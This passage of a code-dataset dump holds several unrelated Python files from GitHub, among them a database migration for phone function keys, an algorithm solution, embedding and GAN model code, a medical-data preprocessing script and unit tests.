phonefunckey_table.c.typevalextenumbers,\n phonefunckey_table.c.fknum)\n\n join_condition = sql.and_(\n phonefunckey_table.c.typevalextenumbers == valid_fk_subq.c.typevalextenumbers,\n phonefunckey_table.c.fknum > valid_fk_subq.c.first_position,\n phonefunckey_table.c.iduserfeatures == valid_fk_subq.c.iduserfeatures)\n\n duplicate_fk_query = (sql.select(columns,\n from_obj=[\n phonefunckey_table.join(\n valid_fk_subq,\n join_condition\n )\n ]))\n\n return op.get_bind().execute(duplicate_fk_query)\n\n\ndef delete_duplicate_fk(iduserfeatures, typevalextenumbers, fknum):\n print('[MIGRATE_FK] : Deleting func key for user \"%s\" (fk position %s with action %s)' %\n (iduserfeatures, fknum, typevalextenumbers))\n\n query = (phonefunckey_table\n .delete()\n .where(sql.and_(\n phonefunckey_table.c.iduserfeatures == iduserfeatures,\n phonefunckey_table.c.typevalextenumbers == typevalextenumbers,\n phonefunckey_table.c.fknum == fknum)))\n\n op.get_bind().execute(query)\n\n\ndef migrate_func_keys():\n for row in op.get_bind().execute(func_keys_query):\n func_key_id = create_func_key()\n extension_id = get_extension_id_from_type(row.extension_type)\n create_forward_destination(func_key_id, extension_id, row.number)\n create_mapping(func_key_id, row)\n\n\ndef create_func_key():\n speeddial_id = get_speeddial_id()\n insert_query = (func_key_table\n .insert()\n .returning(func_key_table.c.id)\n .values(type_id=speeddial_id,\n destination_type_id=DESTINATION_FORWARD_ID))\n\n return op.get_bind().execute(insert_query).scalar()\n\n\ndef get_speeddial_id():\n return op.get_bind().execute(\n sql.select(\n [func_key_type_table.c.id])\n .where(\n func_key_type_table.c.name == TYPE_SPEEDDIAL)\n ).scalar()\n\n\ndef get_extension_id_from_type(extentype):\n return op.get_bind().execute(\n sql.select(\n [extensions_table.c.id])\n .where(\n extensions_table.c.typeval == extentype)\n ).scalar()\n\n\ndef create_forward_destination(func_key_id, extension_id, number):\n destination_query = (destination_forward_table\n .insert()\n 
.returning(destination_forward_table.c.func_key_id)\n .values(func_key_id=func_key_id,\n destination_type_id=DESTINATION_FORWARD_ID,\n extension_id=extension_id,\n number=number))\n\n op.get_bind().execute(destination_query)\n\n\ndef create_mapping(func_key_id, func_key_row):\n conn = op.get_bind()\n\n template_id = conn.execute(sql.select(\n [user_table.c.func_key_private_template_id])\n .where(\n user_table.c.id == func_key_row.user_id)\n ).scalar()\n\n mapping_query = (func_key_mapping_table\n .insert()\n .returning(func_key_mapping_table.c.func_key_id)\n .values(func_key_id=func_key_id,\n template_id=template_id,\n destination_type_id=DESTINATION_FORWARD_ID,\n label=func_key_row.label,\n position=func_key_row.position,\n blf=func_key_row.blf))\n\n conn.execute(mapping_query)\n\n\ndef delete_old_func_keys():\n delete_query = (phonefunckey_table\n .delete()\n .where(phonefunckey_table.c.typevalextenumbers\n .in_(FORWARD_TYPES)))\n\n op.get_bind().execute(delete_query)\n\n\ndef downgrade():\n for row in op.get_bind().execute(old_func_keys_query):\n create_old_func_keys(row)\n delete_mapping(row.func_key_id, row.template_id)\n delete_dest_forward(row.func_key_id)\n delete_func_key(row.func_key_id)\n\n\ndef create_old_func_keys(row):\n supervision = 1 if row.blf else 0\n\n row = {'iduserfeatures': row.user_id,\n 'fknum': row.position,\n 'typeextenumbers': 'extenfeatures',\n 'typevalextenumbers': row.typeval,\n 'typeextenumbersright': None,\n 'typevalextenumbersright': None,\n 'label': row.label,\n 'exten': row.number,\n 'supervision': supervision}\n\n op.bulk_insert(phonefunckey_table, [row])\n\n\ndef delete_mapping(func_key_id, template_id):\n query = (func_key_mapping_table\n .delete()\n .where(sql.and_(\n func_key_mapping_table.c.func_key_id == func_key_id,\n func_key_mapping_table.c.template_id == template_id)))\n\n op.get_bind().execute(query)\n\n\ndef delete_dest_forward(func_key_id):\n query = (destination_forward_table\n .delete())\n\n op.get_bind().execute(query)\n\n\ndef delete_func_key(func_key_id):\n query = (func_key_table\n .delete()\n .where(func_key_table.c.destination_type_id == DESTINATION_FORWARD_ID))\n\n op.get_bind().execute(query)\n","repo_name":"wazo-platform/xivo-manage-db","sub_path":"alembic/versions/dd0c465315d_migrate_forward_func_keys.py","file_name":"dd0c465315d_migrate_forward_func_keys.py","file_ext":"py","file_size_in_byte":11088,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"18647025744","text":"'''\nProblem:\n\nGiven an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n\nExample 1:\nInput:nums = [1,1,1], k = 2\nOutput: 2\n\nNote:\nThe length of the array is in range [1, 20,000].\nThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n'''\n\n\n'''\nUse a dict cnt to count how many times each prefix sum has appeared\n\nIterate over the array nums:\n\n increment the count of sums in cnt\n\n add num to the running prefix sum sums\n\n add cnt[sums - k] to the answer\n \nTime complexity : O(n). The entire nums array is traversed only once.\n\nSpace complexity : O(n). Counter map can contain up to n distinct entries in the worst case.\n'''\n\n\nimport collections\n\n\nclass Solution(object):\n def subarraySum(self, nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: int\n \"\"\"\n ans = sums = 0\n cnt = collections.Counter()\n for num in nums:\n cnt[sums] += 1\n sums += num\n ans += cnt[sums - k]\n return ans\n","repo_name":"HalfMoonFatty/Interview-Questions","sub_path":"560. 
Subarray Sum Equals K.py","file_name":"560. Subarray Sum Equals K.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"9888237624","text":"import pandas as pd\nimport numpy as np\nimport os\nimport datetime\nfrom sklearn import metrics, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.keras import layers\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Model, load_model\nfrom scipy import spatial\nimport json\n\ndef get_model(data, catcols): \n inputs = []\n outputs = []\n for c in catcols:\n num_unique_values = int(data[c].nunique())\n embed_dim = int(min(np.ceil((num_unique_values)/2), 50))\n inp = layers.Input(shape=(1,))\n out = layers.Embedding(num_unique_values + 1, embed_dim, name=c)(inp)\n out = layers.SpatialDropout1D(0.3)(out)\n out = layers.Reshape(target_shape=(embed_dim, ))(out)\n inputs.append(inp)\n outputs.append(out)\n \n x = layers.Concatenate()(outputs)\n x = layers.BatchNormalization()(x)\n \n x = layers.Dense(300, activation=\"relu\")(x)\n x = layers.Dropout(0.3)(x)\n x = layers.BatchNormalization()(x)\n \n x = layers.Dense(300, activation=\"relu\")(x)\n x = layers.Dropout(0.3)(x)\n x = layers.BatchNormalization()(x)\n \n y = layers.Dense(1, activation=\"sigmoid\")(x)\n\n model = Model(inputs=inputs, outputs=y)\n return model\n\ndata1 = pd.read_csv(\"dataset-b-reduced.csv\", engine='python', dtype=str)\ndata2 = pd.read_csv(\"dataset-m-reduced.csv\", engine='python', dtype=str)\ndata = pd.concat([data1, data2]).reset_index(drop=True)\n\nfeatures = [x for x in data.columns if x not in [\"id\", \"target\"]]\n\nle_dict = {}\n# encode all the categorical data\n# fill in \"-1\" for missing values\nfor feat in features:\n lbl_enc = preprocessing.LabelEncoder()\n data[feat] = lbl_enc.fit_transform(data[feat].fillna(\"-1\").astype(str).values)\n le_dict[feat] = dict(zip(lbl_enc.classes_, lbl_enc.transform(lbl_enc.classes_)))\n\ndef myconverter(obj):\n if isinstance(obj, np.integer):\n return int(obj)\n elif isinstance(obj, np.floating):\n return float(obj)\n elif isinstance(obj, np.ndarray):\n return obj.tolist()\n elif isinstance(obj, datetime.datetime):\n return obj.__str__()\n\njsonStr = json.dumps(le_dict, default=myconverter)\nf = open(\"le_dict.json\", \"w\")\nf.write(jsonStr)\nf.close()\n\nmy_model = get_model(data, features)\nmy_model.compile(loss='binary_crossentropy', optimizer='adam')\n\nall_embeddings_dict = dict()\nfor feat in features:\n # my_model.get_layer(\"elemID \").get_weights()\n embeddings = {idx:my_model.get_layer(feat).get_weights()[0][idx] for w, idx in le_dict[feat].items()}\n embedding_df = pd.DataFrame(embeddings)\n\n embeddings_dict = dict()\n index = 0\n for row in embedding_df:\n embeddings_dict[str(index)] = list(embedding_df[index])\n index += 1\n \n all_embeddings_dict[feat] = embeddings_dict\n\njsonStr = json.dumps(all_embeddings_dict, default=myconverter)\nf = open(\"embedding_dict.json\", \"w\")\nf.write(jsonStr)\nf.close()","repo_name":"jiaweilim/Understanding-the-Best-Practices-in-Android-App-UI-Design-Rules-for-User-Privacy-Protection","sub_path":"Analysis/getEmbeddings.py","file_name":"getEmbeddings.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"11059221624","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 16 23:49:29 2018\n\n@author: 
israel\n\"\"\"\n\nclass Inmobiliario:\n def __init__(self,tipo,ventaRenta,precio,ubicacion,m2,estacionamiento,serviciosAdicionales,cuartos,banos,amuebleado):\n self.tipo=tipo\n self.ventaRenta=ventaRenta\n self.precio=precio\n self.ubicacion=ubicacion\n self.m2=m2\n self.estacionamiento=estacionamiento\n self.serviciosAdicionales=serviciosAdicionales\n self.cuartos=cuartos\n self.banos=banos\n self.amuebleado=amuebleado","repo_name":"emilianoNM/Tecnicas3","sub_path":"20ClasesIsraelFP/mobiliarioIsraelFP.py","file_name":"mobiliarioIsraelFP.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"es","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"41587977819","text":"import pytest\n\nfrom models.transformer import Transformer, TransformerGenerator\n\nimport torch\n\ndef test_transformer_forward():\n with torch.no_grad():\n\n src_vocab_size = 10\n trg_vocab_size = 10\n\n hid_dim = 64\n kqv_dim = 4\n\n tfm = Transformer(src_vocab_size, trg_vocab_size, hid_dim, key_query_value_dim=kqv_dim, num_heads=16)\n\n batch_size = 3\n seq_len = 7\n\n src_tokens = torch.randint(0, src_vocab_size, (batch_size, seq_len))\n trg_tokens = torch.randint(0, trg_vocab_size, (batch_size, seq_len))\n\n trnsf_output = tfm.forward(src_tokens, trg_tokens)\n assert trnsf_output.shape == torch.Size((batch_size, seq_len, hid_dim))\n\n\ndef test_generator():\n with torch.no_grad():\n hid_dim = 64\n trg_vocab_size = 10\n trnsfm_gen = TransformerGenerator(hid_dim, trg_vocab_size)\n\n batch_size = 3\n seq_len = 7\n trnsfm_gen_input = torch.rand((batch_size, seq_len, hid_dim))\n trnsfm_gen_output = trnsfm_gen.forward(trnsfm_gen_input)\n assert trnsfm_gen_output.size() == torch.Size((batch_size, seq_len, trg_vocab_size))","repo_name":"mrsndmn/dls-nmt-project","sub_path":"models/transformer_test.py","file_name":"transformer_test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"73329959296","text":"# !usr/bin/env python\n# -*- coding:utf-8 -*-\nimport csv\nimport numpy as np\nfrom sklearn.externals import joblib\n\n\n\"\"\"Generate the data\"\"\"\nf=open(\"F:/test/medical/case_diag.csv\",'r')\ncontent=csv.reader(f)\ndata={}\nfor i,li in enumerate(content):\n if i ==0:\n pass\n elif li[1] not in data.keys():\n data[li[1]]={}\n data[li[1]][\"X\"]={}\n data[li[1]][\"X\"][\"age\"] =\"age.6_10\"\n data[li[1]][\"X\"][\"diag\"] = []\n data[li[1]][\"X\"][\"diag\"].append(li[3])\n if li[4]=='':\n li[4]=2\n data[li[1]][\"X\"][\"cure_before\"]=\"cure_before.%s\"%(abs(int(li[4])))\n data[li[1]][\"Y\"]={}\n data[li[1]][\"Y\"][\"drug\"] = []\n if li[6]=='':\n li[6]=3\n data[li[1]][\"Y\"]['cure_after'] =\"TAG_cure_after.%s\"%(abs(int(li[6])))\n else:\n data[li[1]][\"X\"][\"diag\"].append(li[3])\n if li[6]=='' or not li[6].isdigit():\n li[6]=3\n data[li[1]][\"Y\"][\"cure_after\"]=\"TAG_cure_after.%s\"%(abs(int(li[6])))\nf.close()\nprint(len(data.keys()))\n\nf1=open(\"F:/test/medical/prescribe_record.csv\",\"r\")\ncontent1=csv.reader(f1)\nfor i,li in enumerate(content1):\n if i==0:\n pass\n elif li[4] not in data.keys():\n pass\n else:\n data[li[4]][\"Y\"][\"drug\"].append(li[8])\nf1.close()\nprint(len(data.keys()))\n\nf2=open(\"F:/test/medical/case_residence.csv\",\"r\")\ncontent2=csv.reader(f2)\nfor i,li in enumerate(content2):\n if i==0:\n pass\n if li[1] in data.keys():\n if \"岁\" in li[3]:\n age=int(li[3].split(\"岁\")[0])\n if age>15:\n data[li[1]][\"X\"][\"age\"]=\"age.15_\"\n elif age>10:\n 
data[li[1]][\"X\"][\"age\"] = \"age.10_15\"\n elif age>6:\n data[li[1]][\"X\"][\"age\"] = \"age.6_10\"\n elif age>3:\n data[li[1]][\"X\"][\"age\"] = \"age.3_6\"\n elif age>1:\n data[li[1]][\"X\"][\"age\"]=\"age.1_3\"\n else:\n data[li[1]][\"X\"][\"age\"] = \"age.0_1\"\n else:\n data[li[1]][\"X\"][\"age\"] =\"age.0_1\"\n\nf2.close()\nprint(len(data.keys()))\n\n\"\"\"Build the feature index\"\"\"\nf3=open('feature0.txt','r')\nfeature={};id=0\nfor li in f3.readlines():\n li=li.split()[0]\n feature[li]=id\n id+=1\nf3.close()\n\n\"\"\"Build the label index\"\"\"\nf4=open(\"label.txt\",\"r\")\nlabel={};id=0\nfor li in f4.readlines():\n li=li.split()[1]\n label[li]=id\n id+=1\nf4.close()\n\n\ndataset_X=[]\ndataset_y=[]\nexamples_index=[]\nfor li in data.keys():\n X = np.zeros(1977)\n y = np.zeros(1853)\n examples_index.append(int(li))\n X[feature[data[li][\"X\"][\"cure_before\"]]]=1\n #X[feature[data[li][\"X\"][\"age\"]]] = 1\n for lj in data[li][\"X\"][\"diag\"]:\n if lj in feature.keys():\n X[feature[lj]]= 1\n\n y[label[data[li][\"Y\"][\"cure_after\"]]]=1\n for lj in data[li][\"Y\"][\"drug\"]:\n lj=\"TAG_\"+lj\n y[label[lj]]=1\n dataset_X.append(X)\n dataset_y.append(y)\n\ninput_X=np.array(dataset_X)\ninput_y=np.array(dataset_y)\n\n\"\"\"Save the data\"\"\"\n#joblib.dump(examples_index,\"F:/medical_result/examples_index.pkl\")\njoblib.dump(input_X,\"F:\\project_files\\medical_analysis\\input_X.pkl\")\njoblib.dump(input_y,\"F:\\project_files\\medical_analysis\\input_y.pkl\")\n\ninput_data=np.hstack((input_X,input_y))\nnp.save(\"F:\\project_files\\medical_analysis\\input_data\",input_data)\n\nprint(input_X.shape)\nprint(input_y.shape)\nprint(examples_index[:10])\n\n\n\n\n\n","repo_name":"Deermini/Medical-data-analysis","sub_path":"medical_analysis/gene_data.py","file_name":"gene_data.py","file_ext":"py","file_size_in_byte":3368,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"}
+{"seq_id":"72685855934","text":"import math\nimport numpy\nimport torch\nimport torch.nn as nn\n\ndef MSRInitializer(Layer, ActivationGain=1):\n FanIn = Layer.weight.data.size(1) * Layer.weight.data[0][0].numel()\n Layer.weight.data.normal_(0, ActivationGain / math.sqrt(FanIn))\n\n if Layer.bias is not None:\n Layer.bias.data.zero_()\n \n return Layer\n\nclass NoiseInjector(nn.Module):\n Sampler = lambda x: torch.randn(*x.shape, device=x.device)\n \n def __init__(self, InputChannels):\n super(NoiseInjector, self).__init__()\n \n self.Scale = nn.Parameter(torch.empty(InputChannels))\n self.Scale.data.zero_()\n \n def forward(self, x):\n return self.Scale.view(1, -1, 1, 1) * NoiseInjector.Sampler(x) + x\n \nclass BiasedActivation(nn.Module):\n Gain = math.sqrt(2)\n Function = nn.functional.silu\n \n def __init__(self, InputUnits, ConvolutionalLayer=True):\n super(BiasedActivation, self).__init__()\n \n self.Bias = nn.Parameter(torch.empty(InputUnits))\n self.Bias.data.zero_()\n \n self.ConvolutionalLayer = ConvolutionalLayer\n \n def forward(self, x):\n y = x + self.Bias.view(1, -1, 1, 1) if self.ConvolutionalLayer else x + self.Bias.view(1, -1)\n return BiasedActivation.Function(y)\n\nclass GeneratorBlock(nn.Module):\n def __init__(self, InputChannels, CompressionFactor, ReceptiveField):\n super(GeneratorBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), 
ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, InputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NoiseLayer1 = NoiseInjector(CompressedChannels)\n self.NoiseLayer2 = NoiseInjector(InputChannels)\n \n self.NonLinearity1 = BiasedActivation(CompressedChannels)\n self.NonLinearity2 = BiasedActivation(InputChannels)\n \n def forward(self, x, ActivationMaps):\n y = self.LinearLayer1(ActivationMaps)\n y = self.NonLinearity1(self.NoiseLayer1(y))\n \n y = self.LinearLayer2(y)\n y = x + y\n \n return y, self.NonLinearity2(self.NoiseLayer2(y))\n\nclass DiscriminatorBlock(nn.Module):\n def __init__(self, InputChannels, CompressionFactor, ReceptiveField):\n super(DiscriminatorBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, InputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x))\n y = self.LinearLayer2(self.NonLinearity2(y))\n \n return x + y\n\ndef CreateLowpassKernel():\n Kernel = numpy.array([[1., 2., 1.]])\n Kernel = torch.Tensor(Kernel.T @ Kernel)\n Kernel = Kernel / torch.sum(Kernel)\n return Kernel.view(1, 1, Kernel.shape[0], Kernel.shape[1])\n\nclass Upsampler(nn.Module):\n def __init__(self):\n super(Upsampler, self).__init__()\n \n self.register_buffer('Kernel', CreateLowpassKernel())\n \n def forward(self, x):\n x = nn.functional.pixel_shuffle(x, 2)\n y = nn.functional.pad(x, (1, 1, 1, 1), mode='reflect')\n \n return nn.functional.conv2d(y.view(y.shape[0] * y.shape[1], 1, y.shape[2], y.shape[3]), self.Kernel, stride=1).view(*x.shape)\n \nclass Downsampler(nn.Module):\n def __init__(self):\n super(Downsampler, self).__init__()\n \n self.register_buffer('Kernel', CreateLowpassKernel())\n \n def forward(self, x):\n y = nn.functional.pad(x, (1, 1, 1, 1), mode='reflect')\n y = nn.functional.conv2d(y.view(y.shape[0] * y.shape[1], 1, y.shape[2], y.shape[3]), self.Kernel, stride=1).view(*x.shape)\n\n return nn.functional.pixel_unshuffle(y, 2)\n\nclass GeneratorUpsampleBlock(nn.Module):\n def __init__(self, InputChannels, OutputChannels, CompressionFactor, ReceptiveField):\n super(GeneratorUpsampleBlock, self).__init__()\n \n CompressedChannels = InputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels, CompressedChannels * 4, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer3 = MSRInitializer(nn.Conv2d(CompressedChannels, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NoiseLayer1 = 
NoiseInjector(CompressedChannels)\n self.NoiseLayer2 = NoiseInjector(CompressedChannels)\n self.NoiseLayer3 = NoiseInjector(OutputChannels)\n \n self.NonLinearity1 = BiasedActivation(CompressedChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n self.NonLinearity3 = BiasedActivation(OutputChannels)\n \n self.Resampler = Upsampler()\n if InputChannels != OutputChannels:\n self.ShortcutLayer = MSRInitializer(nn.Conv2d(InputChannels, OutputChannels, kernel_size=1, stride=1, padding=0, bias=False))\n\n def forward(self, x, ActivationMaps):\n if hasattr(self, 'ShortcutLayer'):\n x = self.ShortcutLayer(x)\n \n y = self.LinearLayer1(ActivationMaps)\n y = self.LinearLayer2(self.NonLinearity1(self.NoiseLayer1(y)))\n y = self.NonLinearity2(self.NoiseLayer2(self.Resampler(y)))\n \n y = self.LinearLayer3(y)\n y = nn.functional.interpolate(x, scale_factor=2, mode='bilinear', align_corners=False, antialias=False) + y\n \n return y, self.NonLinearity3(self.NoiseLayer3(y))\n\nclass DiscriminatorDownsampleBlock(nn.Module):\n def __init__(self, InputChannels, OutputChannels, CompressionFactor, ReceptiveField):\n super(DiscriminatorDownsampleBlock, self).__init__()\n \n CompressedChannels = OutputChannels // CompressionFactor\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, CompressedChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer2 = MSRInitializer(nn.Conv2d(CompressedChannels * 4, CompressedChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n self.LinearLayer3 = MSRInitializer(nn.Conv2d(CompressedChannels, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=0)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(CompressedChannels)\n self.NonLinearity3 = BiasedActivation(CompressedChannels)\n \n self.Resampler = Downsampler()\n if InputChannels != OutputChannels:\n self.ShortcutLayer = MSRInitializer(nn.Conv2d(InputChannels, OutputChannels, kernel_size=1, stride=1, padding=0, bias=False))\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x))\n \n y = self.Resampler(self.NonLinearity2(y))\n y = self.NonLinearity3(self.LinearLayer2(y))\n y = self.LinearLayer3(y)\n \n x = nn.functional.interpolate(x, scale_factor=0.5, mode='bilinear', align_corners=False, antialias=True, recompute_scale_factor=True)\n if hasattr(self, 'ShortcutLayer'):\n x = self.ShortcutLayer(x)\n\n return x + y\n \nclass GeneratorStage(nn.Module):\n def __init__(self, InputChannels, FeatureChannels, Blocks, CompressionFactor, ReceptiveField):\n super(GeneratorStage, self).__init__()\n \n self.MainBlocks = nn.ModuleList([GeneratorBlock(InputChannels, CompressionFactor, ReceptiveField) for _ in range(Blocks)])\n self.ToFeatures = MSRInitializer(nn.Conv2d(InputChannels, FeatureChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=0)\n \n def forward(self, x, ActivationMaps):\n for Block in self.MainBlocks:\n x, ActivationMaps = Block(x, ActivationMaps)\n \n return x, ActivationMaps, self.ToFeatures(ActivationMaps)\n\nclass DiscriminatorStage(nn.Module):\n def __init__(self, InputChannels, OutputChannels, Blocks, CompressionFactor, ReceptiveField):\n super(DiscriminatorStage, self).__init__()\n\n self.BlockList = 
nn.ModuleList([DiscriminatorDownsampleBlock(InputChannels, OutputChannels, CompressionFactor, ReceptiveField)] + [DiscriminatorBlock(OutputChannels, CompressionFactor, ReceptiveField) for _ in range(Blocks - 1)])\n \n def forward(self, x):\n for Block in self.BlockList:\n x = Block(x)\n return x\n\nclass GeneratorPrologLayer(nn.Module):\n def __init__(self, OutputChannels, FeatureChannels, ReceptiveField):\n super(GeneratorPrologLayer, self).__init__()\n \n self.LinearLayer = MSRInitializer(nn.Conv2d(3, OutputChannels, kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n self.NoiseLayer = NoiseInjector(OutputChannels)\n self.NonLinearity = BiasedActivation(OutputChannels)\n \n self.ToFeatures = MSRInitializer(nn.Conv2d(OutputChannels, FeatureChannels, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=BiasedActivation.Gain)\n \n def forward(self, x):\n x = self.LinearLayer(x)\n ActivationMaps = self.NonLinearity(self.NoiseLayer(x))\n \n return x, ActivationMaps, self.ToFeatures(ActivationMaps)\n\nclass DiscriminatorEpilogLayer(nn.Module):\n def __init__(self, InputChannels, BasisSize, LatentDimension):\n super(DiscriminatorEpilogLayer, self).__init__()\n \n self.LinearLayer1 = MSRInitializer(nn.Conv2d(InputChannels, InputChannels, kernel_size=BasisSize, stride=1, padding=0, groups=InputChannels, bias=False))\n self.LinearLayer2 = MSRInitializer(nn.Linear(InputChannels, LatentDimension, bias=False), ActivationGain=BiasedActivation.Gain)\n \n self.NonLinearity1 = BiasedActivation(InputChannels)\n self.NonLinearity2 = BiasedActivation(LatentDimension, ConvolutionalLayer=False)\n \n def forward(self, x):\n y = self.LinearLayer1(self.NonLinearity1(x)).view(x.shape[0], -1)\n return self.NonLinearity2(self.LinearLayer2(y))\n\nclass Generator(nn.Module):\n def __init__(self, StemWidth=256, FeatureWidths=[512, 256, 128], BlocksPerStage=[16, 16, 16, 16], CompressionFactor=4, ReceptiveField=3):\n super(Generator, self).__init__()\n \n self.Stem = GeneratorPrologLayer(StemWidth, FeatureWidths[0], ReceptiveField)\n self.Stages = nn.ModuleList([GeneratorStage(StemWidth, FeatureWidths[0], x, CompressionFactor, ReceptiveField) for x in BlocksPerStage])\n \n self.FeatureNoiseLayer = NoiseInjector(FeatureWidths[0])\n self.FeatureNonLinearity = BiasedActivation(FeatureWidths[0])\n\n Upsamplers = []\n ToRGB = []\n for x in range(len(FeatureWidths) - 1):\n Upsamplers += [GeneratorUpsampleBlock(FeatureWidths[x], FeatureWidths[x + 1], CompressionFactor, ReceptiveField)]\n ToRGB += [MSRInitializer(nn.Conv2d(FeatureWidths[x + 1], 3, kernel_size=1, stride=1, padding=0, bias=False), ActivationGain=0)]\n self.Upsamplers = nn.ModuleList(Upsamplers)\n self.ToRGB = nn.ModuleList(ToRGB)\n \n def forward(self, x):\n ImageOutput = x\n \n x, ActivationMaps, AggregatedFeatures = self.Stem(x)\n for Stage in self.Stages:\n x, ActivationMaps, FeatureResidual = Stage(x, ActivationMaps)\n AggregatedFeatures += FeatureResidual\n ActivatedFeatures = self.FeatureNonLinearity(self.FeatureNoiseLayer(AggregatedFeatures))\n \n for Upsample, Aggregate in zip(self.Upsamplers, self.ToRGB):\n AggregatedFeatures, ActivatedFeatures = Upsample(AggregatedFeatures, ActivatedFeatures)\n ImageOutput = nn.functional.interpolate(ImageOutput, scale_factor=2, mode='bilinear', align_corners=False, antialias=False) + Aggregate(ActivatedFeatures)\n \n return ImageOutput\n\nclass Discriminator(nn.Module):\n def __init__(self, BasisSize=4, 
LatentDimension=512, EpilogWidth=1024, StageWidths=[128, 256, 256, 256, 512, 512, 512, 1024], BlocksPerStage=[2, 2, 2, 2, 2, 2, 2, 2], CompressionFactor=4, ReceptiveField=3):\n super(Discriminator, self).__init__()\n \n self.FromRGB = MSRInitializer(nn.Conv2d(3, StageWidths[0], kernel_size=ReceptiveField, stride=1, padding=(ReceptiveField - 1) // 2, padding_mode='reflect', bias=False), ActivationGain=BiasedActivation.Gain)\n \n MainLayers = []\n ExtendedStageWidths = StageWidths + [EpilogWidth]\n for x in range(len(StageWidths)):\n MainLayers += [DiscriminatorStage(ExtendedStageWidths[x], ExtendedStageWidths[x + 1], BlocksPerStage[x], CompressionFactor, ReceptiveField)]\n self.MainLayers = nn.ModuleList(MainLayers)\n \n self.EpilogLayer = DiscriminatorEpilogLayer(EpilogWidth, BasisSize, LatentDimension)\n self.CriticLayer = MSRInitializer(nn.Linear(LatentDimension, 1))\n \n def forward(self, x):\n x = self.FromRGB(x)\n\n for Layer in self.MainLayers:\n x = Layer(x)\n \n x = self.EpilogLayer(x)\n return self.CriticLayer(x).view(x.shape[0])\n\n\n\n\n\n\n\n\n\n#### quick test ####\n# Network2x = Generator(FeatureWidths=[512, 256])\n# Network4x = Generator()\n\n# D = Discriminator(BasisSize=3, StageWidths=[256, 256, 512, 512, 512, 1024], BlocksPerStage=[1, 1, 2, 2, 2, 1])\n\n# print('G params: ' + str(sum(p.numel() for p in Network4x.parameters() if p.requires_grad)))\n# print('D params: ' + str(sum(p.numel() for p in D.parameters() if p.requires_grad)))\n\n# x = torch.rand((4, 3, 48, 48))\n# y = Network4x(x)\n# c = D(y)\n# print(y.shape)\n# print(c.shape)","repo_name":"dustin-wu/Super-Rez","sub_path":"src/model/NetworksV2.py","file_name":"NetworksV2.py","file_ext":"py","file_size_in_byte":15343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19842964605","text":"\"\"\"empty message\n\nRevision ID: ed8b788fd93d\nRevises: eef2a11c8bde\nCreate Date: 2020-11-22 14:04:04.566132\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'ed8b788fd93d'\ndown_revision = 'eef2a11c8bde'\nbranch_labels = None\ndepends_on = None\n\n\ndef 